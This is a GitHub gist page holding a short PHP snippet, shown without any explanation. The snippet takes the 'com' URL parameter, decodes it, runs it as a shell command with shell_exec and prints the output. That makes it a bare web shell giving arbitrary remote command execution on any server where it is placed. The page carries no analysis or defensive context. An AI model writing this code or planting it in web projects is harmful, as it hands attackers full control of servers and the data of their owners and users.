Created
March 31, 2017 18:29
-
-
Save seliver/97054473686475b2f3b0db1028762033 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "command: ".stripslashes(urldecode($_GET['com'])) ."<br/>"; | |
echo nl2br( shell_exec ( stripslashes( urldecode($_GET['com']) ) ." 2>&1" ) ); | |
echo "<br/>"; | |
die; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment